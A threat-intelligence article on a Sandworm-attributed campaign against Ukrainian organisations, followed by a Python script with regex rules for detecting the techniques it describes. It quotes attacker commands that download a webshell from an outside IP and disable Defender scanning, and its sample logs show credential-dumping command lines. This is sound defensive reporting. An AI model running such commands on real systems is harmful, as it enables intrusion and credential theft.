Ukrainian governmental bodies persist in confronting unyielding digital threats from Russian-affiliated hostile entities utilizing intricate evasion strategies to ensure ongoing network entry.

Recent inquiries have revealed synchronized campaigns aimed at vital infrastructure and state organizations, with perpetrators employing advanced methodologies that bypass conventional security measures.

These initiatives signify a notable escalation in targeting techniques, emphasizing credential gathering and sensitive data extraction rather than immediate destructive actions.

The assaults illustrate a tactical transition towards extended dwell times within networks, allowing threat agents to perform thorough reconnaissance and maintain a discreet presence for an extended duration.

Symantec analysts and investigators detected two significant intrusion events covering a two-month operation against a large business services firm and a week-long initiative targeting local governmental infrastructure.

The attackers exhibit strong operational security awareness, minimizing their use of malware and relying chiefly on legitimate Windows administrative tools and dual-use utilities to avoid detection.

The operation seems associated with Sandworm, a Russian military intelligence unit within the GRU recognized for devastating attacks on essential infrastructure such as power grids and satellite communication networks.

The initial compromise occurred via webshell deployment on publicly accessible servers, likely taking advantage of unpatched vulnerabilities. The attackers employed the Localolive webshell to establish a lasting backdoor entry, facilitating remote command execution capabilities.

Living-Off-the-Land Credential Harvesting Mechanisms

The intricate evasion tactics utilized by these hostile agents reflect their comprehension of contemporary security implementations.

After achieving initial access on June 27, 2025, the attackers promptly executed reconnaissance commands using built-in Windows utilities:

cmd.exe /c curl 185.145.245.209:22065/service.aspx > C:\inetpub\wwwroot\aspnet_client\service.aspx
powershell Add-MpPreference -ExclusionPath CSIDL_PROFILE\downloads

The attackers deliberately excluded the Downloads directory from Windows Defender scanning, an action that requires administrative privileges.

They later generated scheduled tasks that executed every half hour using the legitimate rundll32.exe with comsvcs.dll to carry out memory dumps, extracting credentials saved in process memory.

The threat agents specifically focused on KeePass password vault processes through enumeration commands, showcasing precise targeting of credential repositories.

Advanced evasion continued through the application of the Windows Resource Leak Diagnostic tool (rdrleakdiag) for memory dumping tasks, a rarely utilized technique aimed at evading security monitoring systems.

Exfiltration of the registry hive through native reg.exe commands permitted further credential and configuration data extraction.
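The techniques above leave distinctive process command lines. The following is an added illustration, not code from the original report or from Symantec, of how a defender might match them in process-creation telemetry; the rule names, regular expressions and sample log lines are constructed for this example, and the placeholder tokens in angle brackets stand in for values that vary per host.

```python
import re

# Detection rules for the living-off-the-land steps described above.
# Each rule: (name, regex applied to a lowercased process command line).
RULES = [
    ("webshell_drop_to_wwwroot",          # curl writing an .aspx under wwwroot
     re.compile(r"\bcurl\b.*>\s*\S*\\wwwroot\\.*\.aspx")),
    ("defender_exclusion_added",          # Add-MpPreference -ExclusionPath
     re.compile(r"add-mppreference\s+-exclusionpath")),
    ("comsvcs_minidump",                  # rundll32 + comsvcs.dll memory dump
     re.compile(r"rundll32(\.exe)?\s.*comsvcs\.dll.*minidump")),
    ("rdrleakdiag_memory_dump",           # rdrleakdiag used to dump memory
     re.compile(r"rdrleakdiag(\.exe)?\s.*memdmp")),
    ("registry_hive_export",              # reg.exe saving credential hives
     re.compile(r"\breg(\.exe)?\s+save\s+hklm\\(sam|system|security)\b")),
]


def match_command_line(cmdline):
    """Return the names of every rule the given command line triggers."""
    text = cmdline.lower()
    return [name for name, pattern in RULES if pattern.search(text)]


def scan(lines):
    """Run all rules over an iterable of command lines; return (line_no, rule) hits."""
    hits = []
    for n, line in enumerate(lines, 1):
        for rule in match_command_line(line):
            hits.append((n, rule))
    return hits


# Constructed sample telemetry (process command lines), not real logs.
# The first two lines mirror the commands quoted in the article; the rest use
# <placeholders> instead of concrete arguments.
SAMPLE_LOG = [
    r"cmd.exe /c curl 185.145.245.209:22065/service.aspx > C:\inetpub\wwwroot\aspnet_client\service.aspx",
    r"powershell Add-MpPreference -ExclusionPath CSIDL_PROFILE\downloads",
    r"rundll32.exe C:\Windows\System32\comsvcs.dll MiniDump <pid> <out.dmp> full",
    r"rdrleakdiag.exe /p <pid> /o <dir> /fullmemdmp",
    r"reg.exe save HKLM\SAM <out>",
    r"powershell Get-Process | Where-Object {$_.Name -eq 'svchost'}",  # benign admin activity
]

if __name__ == "__main__":
    for n, rule in scan(SAMPLE_LOG):
        print(f"line {n}: {rule}")
```

Each rule is deliberately narrow; in production these would be tuned against the environment's baseline of legitimate administrative activity and correlated with the scheduled-task creation that the article describes.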

The campaign demonstrates threat actors prioritizing discretion over speed, utilizing legitimate administrative tools to maintain ambiguity in attribution while systematically gathering sensitive organizational data throughout prolonged network access phases.